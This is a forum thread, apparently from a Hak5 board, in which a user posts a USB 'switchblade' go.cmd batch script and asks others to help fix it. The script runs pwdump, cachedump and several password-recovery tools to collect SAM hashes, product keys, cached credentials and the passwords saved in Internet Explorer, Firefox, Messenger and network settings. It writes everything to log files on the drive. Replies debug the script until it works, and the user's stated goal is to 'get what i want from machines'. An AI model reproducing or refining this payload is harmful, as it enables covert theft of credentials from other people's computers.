Help

[confused]

I have been trying to modify the go.cmd file to get what i want from machines and i came up with this, and it's not working, any ideas why? Can anybody help me? And I do have a Sandisk 1GB U3 drive.

And I also put payload 1.1 on the root of my drive.

@echo off

if not exist WIPdump md WIPdump >nul

if not exist WIPdump%computername% md WIPdump%computername% >nul

cd WIPCMD >nul

@echo off

if not exist Documents md Documents >nul

if not exist Documentslogfiles md Documentslogfiles >nul

cd wipcmd >nul

Echo ************************************ > Documentslogfiles%computername%.log 2>&1

echo ***********[system info]************ >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> Documentslogfiles%computername%.log 2>&1

ipconfig /all >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

Echo ***********[Dump SAM]*************** >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

.pwdump 127.0.0.1 >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ***********[Dump Product Keys]****** >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

.produkey /nosavereg /stext "WIPdump%computername%%computername%_pk.log" /remote %computername% >> WIPdump%computername%%computername%.log 2>&1

copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_pk.log* WIPdump%computername%%computername%.log >> nul

del /f /q "WIPdump%computername%%computername%_pk.log" >nul

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ***********[Dump IE7 secrets]******* >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

.iepv.exe /stext "WIPdump%computername%%computername%_ie7.log" >> WIPdump%computername%%computername%.log 2>&1

copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_ie7.log* WIPdump%computername%%computername%.log >> nul

del /f /q "WIPdump%computername%%computername%_ie7.log" >nul

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ***********[Dump Network PW]******** >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

.netpass.exe /stext "WIPdump%computername%%computername%_np.log" >> WIPdump%computername%%computername%.log 2>&1

copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_np.log* WIPdump%computername%%computername%.log >> nul

del /f /q "WIPdump%computername%%computername%_np.log" >nul

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ************[Dump Cache PW]********* >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

.cachedump.exe >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ***********[Dump messenger PW]******** >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

.mspass.exe /stext "WIPdump%computername%%computername%_ms.log" >> WIPdump%computername%%computername%.log 2>&1

copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_ms.log* WIPdump%computername%%computername%.log >> nul

del /f /q "WIPdump%computername%%computername%_ms.log" >nul

set RtD=%CD%

cd /D "%appdata%MozillaFirefoxProfiles" >nul

set PROFILE=

for /D %%i in (*) do set PROFILE=%%i

cd /D %RtD% >nul

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

Echo *********[Dump Firefox PW]********** >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

.FirePassword.exe "%appdata%MozillaFirefoxProfiles%PROFILE%" >> WIPdump%computername%%computername%.log

:End

exit

[Forgotten]

If you would be so kind as to explain what parts are not working?

We need to know in order to help you successfully. And just a quick FYI, you do not need to declare "@echo off" a second time.

[confused]

OK, i took the second echo off out, and now i get the system info and then it says "dump sam" and it's it. I don't know much C language, mostly HTML and python, so i'm having a little trouble with this.

THanks for your help

[confused]

Could somebody possibly give me step by step instructions about what payload(s) to get and what to put the following switchblade packages

go.cmd

System Info

Product Key

Internet Explorer Password Grabber

Network Password Dumper

Cachedump

Messenger password Dumper

I am slightly confused about how to arrange these in the go.cmd file. Because I only seem to get the system info and that's all.

[Forgotten]

A useful wiki page for custimizing your own go.cmd is here:

http://hak5.org/wiki/Switchblade_Packages

Maybe that will help you.

[confused]

THat's where I got the code the first time for the go.cmd.

How do i link them together?

Do I need a blank line inbetween or does one just flow into the next?

With the payload 1.1 all i can get is the system info, and i noticed in the WIPCMD where the go.cmd file is there are the programs that the code is for in the go.cmd file.

DO I need the code and the individual programs?

IS there a certain order?

~Thanks for all your help.~

[Forgotten]

THat's where I got the code the first time for the go.cmd.

How do i link them together?

Do I need a blank line inbetween or does one just flow into the next?

With the payload 1.1 all i can get is the system info, and i noticed in the WIPCMD where the go.cmd file is there are the programs that the code is for in the go.cmd file.

DO I need the code and the individual programs?

IS there a certain order?

~Thanks for all your help.~

You can add them any way you want, the go.cmd doesn't care if you have them right next to each other or 50 lines down.. No particular order.

All files you download go in the /WIP/CMD

[confused]

IT works now! THank-you, oh and if i just see

***********************************

***********[Dump IE7 secrets]********

***********************************

in the log file does that mean that there were no passwords or info in the ie explorer ?

[remkow]

If there is nothing after it, either there was an error in the program, or there was indeed no info/passes available